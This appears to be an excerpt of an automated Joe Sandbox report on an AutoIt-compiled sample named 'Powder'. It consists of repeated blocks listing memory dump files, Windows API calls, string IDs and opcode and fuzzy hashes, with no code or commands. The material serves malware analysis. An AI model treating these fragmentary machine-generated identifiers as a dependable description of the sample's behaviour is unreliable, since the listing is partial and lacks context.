                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 8e03f94dfcacbcc392ea7c9ee9f68b14e4009f48d733a70d71f48b474ccf3078
                                                  • Instruction ID: e397b04ee437e0dcf738377cca5218f87f4bd87a2c58b8ce48073025ec9c4399
                                                  • Opcode Fuzzy Hash: 8e03f94dfcacbcc392ea7c9ee9f68b14e4009f48d733a70d71f48b474ccf3078
                                                  • Instruction Fuzzy Hash: B45159B24087449BE320AF51EC85BAFB7F8FF85314F41484DF2D8511A1DB709568CB26
                                                  APIs
                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E88186
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E8819B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: 81fc018be359b0010ecbdedd5d144f2e01f862278bd244317531472c8a5fefe4
                                                  • Instruction ID: ce5b2d5cdedc3bc25b97125d5498c7151fee1462c4d787854f0b94d89ec2e7ac
                                                  • Opcode Fuzzy Hash: 81fc018be359b0010ecbdedd5d144f2e01f862278bd244317531472c8a5fefe4
                                                  • Instruction Fuzzy Hash: 1E411674A012099FDB14DF69C985BDABBB5FF08300F50116AED48AB392DB31A946CF90
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00E8713C
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E87178
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 9d41e740cfb612217fe279b3b7d5e2945c03719526c337cce9ced4371a409683
                                                  • Instruction ID: 7527baaad7d71368c91332cf34a109f1a112bccf6af52161ac8fa47ce886e2f5
                                                  • Opcode Fuzzy Hash: 9d41e740cfb612217fe279b3b7d5e2945c03719526c337cce9ced4371a409683
                                                  • Instruction Fuzzy Hash: 8F317E71100604AEDB10AF74CC84AFB77A9FF88764F10A61AF99DA7191DB31AC81DB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E630B8
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E630F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: a6d4e61eedecf5fdb7906f39eddc08bc11142566d14bf77a313a01bf549ab4c1
                                                  • Instruction ID: ecddbff1a4c1feb9c33ea1f827727b73ccfcf0c025b260189b9f2a0e9daf4cdf
                                                  • Opcode Fuzzy Hash: a6d4e61eedecf5fdb7906f39eddc08bc11142566d14bf77a313a01bf549ab4c1
                                                  • Instruction Fuzzy Hash: DF31D531641205AFEB248F68E985FAEBBF8EF063D4F145019E985B61A2D7709F44CB50
                                                  APIs
                                                  • __snwprintf.LIBCMT ref: 00E74132
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf_memmove
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 3506404897-2584243854
                                                  • Opcode ID: 04b9eae84ad031b93496783543b4af4e4e80ba0b1e400b6f7d1dd5c388745e89
                                                  • Instruction ID: 1898413556826dc5ee69f6f483332acfd4d809b145cc84a875b3419448be0fbf
                                                  • Opcode Fuzzy Hash: 04b9eae84ad031b93496783543b4af4e4e80ba0b1e400b6f7d1dd5c388745e89
                                                  • Instruction Fuzzy Hash: 80216471A0021DABCF14EF64C892EEE77F9EF54340F845498F909B7181DB70A985CBA1
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E86D86
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E86D91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: f259956e449e9785eb86c8ca9679ba166991d72ff51de97c03b12c901ee0543b
                                                  • Instruction ID: b3fb16484994224cf34f7e24b3876bc8684d5928feb78d69d2068042a1c8d6ba
                                                  • Opcode Fuzzy Hash: f259956e449e9785eb86c8ca9679ba166991d72ff51de97c03b12c901ee0543b
                                                  • Instruction Fuzzy Hash: F0118271310209BFEF11AF55DC81EFB3BAAEB84368F115129F91CAB2D0D6719C518760
                                                  APIs
                                                    • Part of subcall function 00E02111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E0214F
                                                    • Part of subcall function 00E02111: GetStockObject.GDI32(00000011), ref: 00E02163
                                                    • Part of subcall function 00E02111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E0216D
                                                  • GetWindowRect.USER32(00000000,?), ref: 00E87296
                                                  • GetSysColor.USER32(00000012), ref: 00E872B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: 1a5055758fc071342832cd89483383427468459bf7e717e7f1540baa01d770ca
                                                  • Instruction ID: 62bbe3798ab2301fd6b333484612c8e22734f36aa72e4b0adda766f0633d0302
                                                  • Opcode Fuzzy Hash: 1a5055758fc071342832cd89483383427468459bf7e717e7f1540baa01d770ca
                                                  • Instruction Fuzzy Hash: B221477261420AAFDF04DFA8CC45EEA7BA8EB48304F105519FD99E3250D735E8519B50
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00E86FC7
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E86FD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 40045bc2310763ac09854b0d304902ba5e1fe37c0cd875f599ca2b093703df2b
                                                  • Instruction ID: c77acd6799415fe55a6e6d5932fdbf9513bb42e686d45dbc89ca00300bfd6bb5
                                                  • Opcode Fuzzy Hash: 40045bc2310763ac09854b0d304902ba5e1fe37c0cd875f599ca2b093703df2b
                                                  • Instruction Fuzzy Hash: 26118271200208AFEB106E64EC44EEB3BA9EB05368F505714FA6CB71D0C775DC519B60
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E631C9
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E631E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: a2a8bf7669a4a0513732743dc5f57b48ecc3b623af941e9febccad79f9db7341
                                                  • Instruction ID: a99d51a3c8905325ac20c163c5a2ab1d46daf231a4a7602912a806ffcc66b0d2
                                                  • Opcode Fuzzy Hash: a2a8bf7669a4a0513732743dc5f57b48ecc3b623af941e9febccad79f9db7341
                                                  • Instruction Fuzzy Hash: 4B112635942114AFDB20DAB8EC05F9D77F8AB07384F142126E851B72A0D731AF05CF90
                                                  APIs
                                                  • DeleteObject.GDI32(?), ref: 00E0351D
                                                  • DestroyWindow.USER32(?,?,00E14E61), ref: 00E03576
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: DeleteDestroyObjectWindow
                                                  • String ID: h
                                                  • API String ID: 2587070983-1717268160
                                                  • Opcode ID: 88937ee6f3c117dc9ef914d09bfeae6def0dab612e3a5479199d6b3761443392
                                                  • Instruction ID: 59ec16c482d25c70acfad9481b1c1cf5db1133406f556dca25efe2fc7f01fdd8
                                                  • Opcode Fuzzy Hash: 88937ee6f3c117dc9ef914d09bfeae6def0dab612e3a5479199d6b3761443392
                                                  • Instruction Fuzzy Hash: FA211271609220CFCB18DF2AEC58E6533E5A744315B046169E946BB3F5D732DE8ACF41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp
                                                  • String ID: 0.0.0.0$L,
                                                  • API String ID: 856254489-1974781669
                                                  • Opcode ID: 818f4c70633dd241ec073b439ecf9a43bbfcb51ca158c14d18f485b77f52a5d9
                                                  • Instruction ID: 1c503e050cddfe0276dcc8d49d705e71066340bfa226f874fd3f8f8d9ee1e2ac
                                                  • Opcode Fuzzy Hash: 818f4c70633dd241ec073b439ecf9a43bbfcb51ca158c14d18f485b77f52a5d9
                                                  • Instruction Fuzzy Hash: 2C11B2B5B442059FCB04EF14D981EAAB3F5AF85715F509049EA097F3E1CA70ED82CB50
                                                  APIs
                                                    • Part of subcall function 00E786E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E7849D,?,00000000,?,?), ref: 00E786F7
                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E784A0
                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00E784DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 2496851823-2422070025
                                                  • Opcode ID: 4cc78ff45ee5c7fe6f7118fe0a3fbebc53b194546ee1372da9a1bd7cdbec1e69
                                                  • Instruction ID: 5d519dd22ec9808e79594fed382b24100dd53f54fa4f84885df49b9f1bdd061f
                                                  • Opcode Fuzzy Hash: 4cc78ff45ee5c7fe6f7118fe0a3fbebc53b194546ee1372da9a1bd7cdbec1e69
                                                  • Instruction Fuzzy Hash: 2011E530140206ABDB20AF64CD4AFEEB364FF14320F10961BF929772D1EB71A814C795
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E5B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E5B7BD
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E59A2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 37080161962f78fb481475bdbd7f8a6fd88929ef7168ba795ea6116f75e0a785
                                                  • Instruction ID: dc3018c35999fffdc4194cef723f92ab74b73de6889c68e2cc639d105d06bd27
                                                  • Opcode Fuzzy Hash: 37080161962f78fb481475bdbd7f8a6fd88929ef7168ba795ea6116f75e0a785
                                                  • Instruction Fuzzy Hash: 2301F571A42214AB8F14EBA4CC51CFEB7A9BF56360B101B1AFC61732C2DB30590C8660
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E0BC07
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  • _wcscat.LIBCMT ref: 00E43593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FullNamePath_memmove_wcscat
                                                  • String ID: s
                                                  • API String ID: 257928180-1727430956
                                                  • Opcode ID: 5dd5777a615445c817b11a80d0cbcab7fe3e3a250583cc5d95c638a1cf526b89
                                                  • Instruction ID: ab64531816eeb389bb273c95da12a2eeeda497f189353c5059800278949672ae
                                                  • Opcode Fuzzy Hash: 5dd5777a615445c817b11a80d0cbcab7fe3e3a250583cc5d95c638a1cf526b89
                                                  • Instruction Fuzzy Hash: 841188359042089BCB05EBA49982EDEB7FCFF08350B1061AABE85F7291DF7197C49B51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: b15874e98a762847847e0e1a073a5675afee8534033743115f180876ea811333
                                                  • Instruction ID: de910f44900d9720a1e505685c0df155326a939f700e0a93b417e7cadca63df4
                                                  • Opcode Fuzzy Hash: b15874e98a762847847e0e1a073a5675afee8534033743115f180876ea811333
                                                  • Instruction Fuzzy Hash: DF01F9728442687EDB28C6A8D856EFE7BFC9B11301F00419AF552E2281E5B4E6048760
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E5B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E5B7BD
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E59923
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 0db7ea09e43c34dade050d8c36c02375f9423da38a1ceb2b20b89a6672b6a195
                                                  • Instruction ID: f470b4f6570a867f829e6f21c6dc2dca77b03a2a0572427e28a10c096c94464c
                                                  • Opcode Fuzzy Hash: 0db7ea09e43c34dade050d8c36c02375f9423da38a1ceb2b20b89a6672b6a195
                                                  • Instruction Fuzzy Hash: 7D01DB72A42104ABCF14EBA4C952EFFB7EC9F55341F14255ABD4173282DA105F0C96B1
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E5B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E5B7BD
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E599A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 3b136eef2736637217b234eb298ae8fbc1f55f4e64b64d739f5d0d0a0bee01a8
                                                  • Instruction ID: 9533965aa94e6e5deb91285737e8000c17ef7bd7a3266874a89928058f530fd1
                                                  • Opcode Fuzzy Hash: 3b136eef2736637217b234eb298ae8fbc1f55f4e64b64d739f5d0d0a0bee01a8
                                                  • Instruction Fuzzy Hash: A601DB72A42104ABCB14EBA4C912EFFB7ED9F55341F14255ABD4573282DA144F0C96B1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt
                                                  • String ID: @b
                                                  • API String ID: 3494438863-2077063687
                                                  • Opcode ID: 51a1d99915ac8bf11deb9e839427098653219fe0cc6810c82df6adb63b41137b
                                                  • Instruction ID: 0ac41e5530a4ddd2526881994a99f59bfe03969317f3dc44627dc205a936be14
                                                  • Opcode Fuzzy Hash: 51a1d99915ac8bf11deb9e839427098653219fe0cc6810c82df6adb63b41137b
                                                  • Instruction Fuzzy Hash: E8F0C8B130C226CFF7389F29BD01FA167D4E740324F10217AF540FA1A4EB7188C24A80
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
